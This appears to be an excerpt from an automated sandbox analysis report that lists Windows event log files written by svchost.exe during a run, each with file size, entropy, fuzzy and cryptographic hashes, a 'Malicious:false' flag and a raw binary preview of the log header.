                                                                                                    Preview:ElfChnk.T...............T.............................V....................................................................}e.........................................>...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................1........................................<...............(..........**......T.......B..d..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4WHC.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):0.9026062677089721
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:cmh6iIvcImIvITIQIoIoI3IEIMIoIBIjIIQIYIRIEMIO4IvIPIAIII:cmoxDJ
                                                                                                    MD5:5804920425A4E3269D7609A5DBD75403
                                                                                                    SHA1:AA220AEE0488F93D9441A1DE1A816E00768168B3
                                                                                                    SHA-256:1FF4DAFDF8B5CD5858291753C7E43EF28567F1F802A8723B5CF3859DF59D9EF5
                                                                                                    SHA-512:6AEB374908A7FD11C330BF7814E14B7F48250CBA2A51BCA80A8ABB14D3A56CA7936939ED7F55519C18DEF8C6070B739ADD83AB2480D9936BA8C1A526BC215B90
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.....................................x'...(....RX....................................................................................................................=...........................................................................................................................f...............?...........................m...................M...F...........................&...........................................................................................................^...........**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-Partition%4Diagnostic.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):3.410240819170099
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:K4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH13I:I
                                                                                                    MD5:0A7DC618A17C5DBFEE9CDEF8D5FE0558
                                                                                                    SHA1:2E5C6E3A39FD664CD9297B99721B237563EC9DAF
                                                                                                    SHA-256:BC74AF16EE61EB5932C717BDF60997E1CEFBDEC8AD73B600F84F8EE045D9498E
                                                                                                    SHA-512:A97C4725E2FEC63E5280A9E452F21D77753BAF1D53D167D892D2B03ED1875AABC1D7BACC6497E6E3393CBC72AAD7EC78659DBC77C041E419F329243D587D3256
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.....................................h...x............................................................................8..................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ......................................................................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):3.342099733536711
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:amhKy4ynyyUyLZyzGywyByLlayoB/X/n/P/knJ/8i/y/R/nutDxfPKDU1xV8k+uN:57RM5utDBjV8k+u7extHpoVWW
                                                                                                    MD5:46D0CB21E60A17FD75DE6877B17FEE8D
                                                                                                    SHA1:70593CD41E5FBF14897F454655C4C7F7E0DBC5D8
                                                                                                    SHA-256:88D10C37173A612C7CFD32607DF18A0B1E30E7B26FDCB8BB8E648ED7598B801D
                                                                                                    SHA-512:A209B594EDA61A57C19D33124A6E87A4C97048556D69FA20E1B9646A89686CA955C8D4F5A1A781D5041C9C2613456932F6F1266639C32AE24E1D55CE6520AFF1
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.................g.......o...............@...5TTd....................................................................L.(.................2...........................=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**..`...g.....................F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-PushNotification-Platform%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.79726221571279
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:xhtKxPK3KqK+K8K0KoKaKXKrK5iaKIBKsGKiKX7EKhKRDKIKVKZKO1KFKEqKEcKF:xKDicqQMGXol5lwtNCcWk+i6gWkjG
                                                                                                    MD5:CD255DB442AA16A78C4134BFD501DBEB
                                                                                                    SHA1:F7F2E1C3C270809CD86EB517B320FC6678423E0A
                                                                                                    SHA-256:C70A313D47A75332F16ECCE8A0080B02A626AF58863339D0BB85C20D82A09DBE
                                                                                                    SHA-512:85CB0339DE8405ED8BD1F6A5F65E2A2FD4445E18258E213D8C613115B054F3CA31B5B994D5A360D0F097A966E8DA40E6FEE2B5CF1880C9119A288B36D0C06E24
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.0.......L.......0.......L...........xI...K...;6.....................................................................`..}................p...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................OC..........O......._'../........................"............... ..........................&........-..**......0........D.c.........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):0.8494451744269971
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:yhP8o8Z85848V8M8g8D8R8E8y8eE8U8+8G8h8M8H8:yy
                                                                                                    MD5:2806C45E09D18AC03F69A60B643D1D38
                                                                                                    SHA1:9FB0A7030248B1D8945BFBD094C21D20C168E03B
                                                                                                    SHA-256:380D630B4DEB1FDA4A304608F302D6D6312DF2DAE68FB96B87682F8C742B150D
                                                                                                    SHA-512:943A7B00809896A5EF3F6309361C4B47613658E964C1FB53C82D3B6F15DCB1CFD4C0D1B14BB79B4719D4F4573879BA267531CBF82A067AFA7CEDE0942C25014C
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.....................................($...%..q..+....................................................................x...........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...........................................................................v...........**..(.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):3.8026235921669143
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:QXhicUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMj1:QXMcnS
                                                                                                    MD5:AF82C2F6662BD0C2A3B26A6B94E2FF8E
                                                                                                    SHA1:19C69A2AD624397A102A32C3F9BD25864F07541E
                                                                                                    SHA-256:F8BEB10C76C175CD844B48C26404FF5F173C5A89BB98A6CE607BAD10E9F07C4A
                                                                                                    SHA-512:AFF2340499228D52A0FCDDDCFCFC7BFD50B0B0FF9195AC3937EA4D74858BDE1E63318FF6152545F5B66E6FE60E31AFA0B9252191BC02A819D446FD6E2064222B
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk......................................T...V....5....................................................................N.u.................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................O............9..........**..............g5...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):2.646898922421028
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:W0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9O4aui1J6eJOQJMBJXTO:ecEr
                                                                                                    MD5:145ABA555E75A6F6BCE761B8A1D66D12
                                                                                                    SHA1:FD678C95EE1F5A0F8647815A50E1C0A92DA59121
                                                                                                    SHA-256:93D3212BFD60211C4ABBF909B98348B667F5E6C87742E4E415739A306060BF3B
                                                                                                    SHA-512:573E6C765A4CDFEB74517DDD1A39658F72290F0124AC33CEDB6A13AEDB497966FD3B9857E02B841C127E2302568D74B043D481FCD0159AFD84D11CDFDEA3E4F9
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.........G...............G...................{1U.....................................................................l."t................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F...........................*...........&....]..................................................................................]...................**.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-SettingSync%4Debug.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.314772956855766
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:zhFChtCgoCzCRCFCZC4MCyCcC7CgzCiCoCD24F2a2EO2M2w2s023C8CJCpCFICph:z1oNT2l
                                                                                                    MD5:9423B3B7DB9AD9CA42101616F969F710
                                                                                                    SHA1:3C309A9F6DFA428272F9696A8EB272F56290156C
                                                                                                    SHA-256:A3CF17833945EA911C21A538513A69E61CB21F41178CEDC5A09BC534CE647BAC
                                                                                                    SHA-512:806D3319672309356CA414AA212009B217B2923AB5AC7047D3F6CCE7F417A0928CF705C89D519E0236E435DD8158124E5DA31DE12E6CB4A7834FE4FAE85BD91E
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.....................................0...8...@........................................................................2..................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**..0...............c.........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4AppDefaults.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.493506047116424
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:scPLvjwmE+ukWvw75NFyBo/QbG7YX1cchg52p5cfFSYl8ZAgWCx/i1UkHAbZ7NG5:scPLvjwmE+ukWvw75NFyBo/Qq7YX1ccs
                                                                                                    MD5:8AD42A99D4F9F55E09B25BCD80C1B117
                                                                                                    SHA1:6D1A1595D74941BCFABB526D013675ACDF06D896
                                                                                                    SHA-256:1926D9FD3CCFD55DF5D27BCEDE5E07862F8E3D15DDFE2CE3C4016BCD875FA1D2
                                                                                                    SHA-512:6D88E42D47BBE4F7F7992754D17A0FC821794F2CF1829EA2D52F5FA86719A7034C921E38069C28B98F882B9D4E035C43E54F9F15C0351DDE7F4FAE8B1E58DA93
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk......... ............... ............|..x~.....2........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&............................................................................I..........**..............XH^...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.468156688270642
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:SHryIS7VKbG5jQxyyyEYVJd4wG8soU5FlLUp50ihVdC63Isgkl+mF6jutzpfs1na:SHryIS7VKbG5jQxyyyEYVJd4wG8soU5q
                                                                                                    MD5:6A684BB08BED0A99D8B46DAB3E2BC8CD
                                                                                                    SHA1:9B9C5D5D8A6A6EFE132DCE9D0178D44C0444BAAB
                                                                                                    SHA-256:D4D3D78CA64CC055109145D9E36E783DF12818E99202494769306D5BB875008F
                                                                                                    SHA-512:385EEC6EAE048EB1306AA225E8589B20E86B382EAF3F139F0E74C3D2B11B1EA9D9D2775AF27D0322D1CEA1D6486E87FABDE9D3AE2C284D6F1EC5473241373177
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.........Q...............Q...........@.......(.Em....................................................................L.FP................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................i.......9..............................&...A.......**..............B.D.c.........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):66768
                                                                                                    Entropy (8bit):4.497022429338274
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:eB7z0Jrhl787V7s7y7s7M787/7m7C7p74797kc7h7s7b7Y717c7v7b7v7vV7p73g:n1t/qMWVh
                                                                                                    MD5:C0B84966696D7679B791506977B2CDD3
                                                                                                    SHA1:FFEAF4096336A62AE5E125CF01922BF91B2BF1E6
                                                                                                    SHA-256:B883440EBE75A840A50484602B38F415B5FDB69C16EBFA71B36313A919F981FE
                                                                                                    SHA-512:39CA909074D6F15B3D0881024AC6DAF5535F08A18045FD4656DAB9CB6583F8BB36AC70CE7245327235B3FD6CEF261F5A800DA19182941FB70840814D82F07D50
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.........................................`....-SE.....................................................................@.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................-(..............E!..s...........&...............................................................-&..........f@..........**...............h...........F..f@..............................................................f.......~.....!.....N..........@.h........c....S..c.......x#...........................$.N......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.h.e.l.l.C.o.m.m.o.n.-.S.t.a.r.t.L.a.y.o.u.t.P.o.p.u.l.a.t.i.o.n.B.....K..p...1.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.h.e.l.l.C.o.m.m.o.n.-.S.t.a.r.t.L.a.y.o.u.t.P.o.p.u.l.a.t.i.o.n./.O.p.e.r.a.t.i.o.n.a.l...Q...s...................$...T.~.S.t.a.r.t.S

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Connectivity.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):2.513517084056383
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:5hc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauinN:56Ovc0S5UyEeDgLLyfrlB8Q54GJYFN
                                                                                                    MD5:86328FE8E0D9FD764909382ABB71A55B
                                                                                                    SHA1:BD50852F94323E1C42CEF0A81370253793455128
                                                                                                    SHA-256:AE09BDE973314507341F7545AAF46CD5BA9FF87C65A7B348FB6B7A504B2C311A
                                                                                                    SHA-512:A03AA12F12CF7B2F2759713CB7821E9AF5F69BB942E484E482491123A317C31F755CD560396A13ECDB4C8AC987587FC76F7F67CA470C3778FFE4E3A7CCB666D6
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.........I...............I...............x...d&B.......................................................................j................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................................................................w...................._..........**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Security.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):0.9111169569250959
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:BhGuZumutu4uEu5uOuDuyb2uPu1uyuKtuLujuVgquau7utu:Bb+
                                                                                                    MD5:65EE06ED82C92882C0B30DE9C59BDF0F
                                                                                                    SHA1:763B70DC2B63BF0FE3985E3C89619CB87CE599DC
                                                                                                    SHA-256:A55AC3B30BF0CECB159D885725F72860E93F7AF93D56333DFBDDE61B4F09F0A1
                                                                                                    SHA-512:31C99AA41C4C6313EA60E4AA50C54757C7796CD5F1805CFD2C530C5266E2475B975D1458A0D9B443CE47139D8F3FB68276A04EEE642354E18BD95C7CCB2C5751
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk......................................'..@)..........................................................................A2..................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...........................................................................>...........**..............Wy.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-StateRepository%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.211809501239778
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:HhzASWeASbAXKShA6A7ADDAsbAnUASZNASIAKLAyAdyqA1AnA2AOA6AGAeArAQAL:HgRKS3MOTi+KLN6gCvh
                                                                                                    MD5:DF78BC97D0CB011E784341C7E29E589A
                                                                                                    SHA1:0D7F5DF4F83A068FF3F34BA96C44D782F7C0B4B6
                                                                                                    SHA-256:BF2B6E050D1B4663A92E4BE497DD72165DA2B389BCE5488FEF13A79D24011C80
                                                                                                    SHA-512:E5F1016AF40DC3A7DBDDC0201A67E64451618DC66D45CFF3EF305FB0FEEC649FD7A4595A3C1E4B75894806B7A3910B521C1BB54CF11C232A2A118AC619451183
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.B.......Y.......B.......Y............2...4...........................................................................k}.................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................M"..........................................................................................................&...........**......B.......m=.hc.........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Health.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):2.0004944299782244
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:Uvh68psqp9hp9wp9Dp9ep9Zp9Ep9Lp9Wp9dp9gp9np9ap95p9op9Dp9yp9pp9Ip2:Uv4w
                                                                                                    MD5:17E1F6A923B394468B7E7AC13A6D5A70
                                                                                                    SHA1:6BB9BD876DA67DD7E91409B7B54D87BD9466E616
                                                                                                    SHA-256:8209D19A5F3BB68414DBC36A6697C890C1A6F8D2EB94631D0B6C890BFC04FC8D
                                                                                                    SHA-512:EB497377962021D265A243880AED479A9374B83834B47300FA5879E0C5D825F3D1C8053648E6A4F6F232F08495D5A33D9137BEBBB7FAFB1F182CE636D7AB706D
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.~...............~....................p...s....H.....................................................................?...........................................<...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**......~..........nc.........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.250004965973641
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:/hbDp2d5p6vpl9pjxV1pHZpzHpHsIpb2Vpsdp0gpjUqpktzpOQpIApRhVpbM5pL4:/faDh1VvpE0Y5RA8sQsu
                                                                                                    MD5:0DDDE872D2B30C75A2EC756FA940A755
                                                                                                    SHA1:8D254C1A7C4BAD2FB69ED7FB0CC377A2E53F65B0
                                                                                                    SHA-256:CC9291C1282B20AD26270C0C532A742B9504E21463553DD16B3A13145045E7AE
                                                                                                    SHA-512:D360847D79623B9509DE27CBB2A418EED679A205B0A0D08D3731BEF52425D9C7BE60D8330F9E7C08ACB21C0279F763EECCA1302B461EDA9CCF2B694DA0335784
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk......................................9..X;...=........................................................................<.................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................I.......................................&...........**..............8..]c.........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):1.3289207454813916
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:yhwCCRzCaCkClCzCYC/CyCVCGCMCvCtlCaf2Ca9CaECaAzCaFECalCa9CafCaWCa:yKFD
                                                                                                    MD5:0F17EC060875E9ABCD98D78F39799A40
                                                                                                    SHA1:CDF257B9028997705838873AC77FCC8BF60E0825
                                                                                                    SHA-256:40D2379CA92439C3B28964CB89E09C9191AE017543BA3E77B626702517FA20CC
                                                                                                    SHA-512:64A0D82DDBE97D80513F4E20D7CE1031AF279C1DD03E2BEDE5C37F77D369B3CF8BFD1682C648C62BF7369EB5FF9EE2E1B72A9ADA2F30490B9BF7F4C464585C89
                                                                                                    Malicious:false
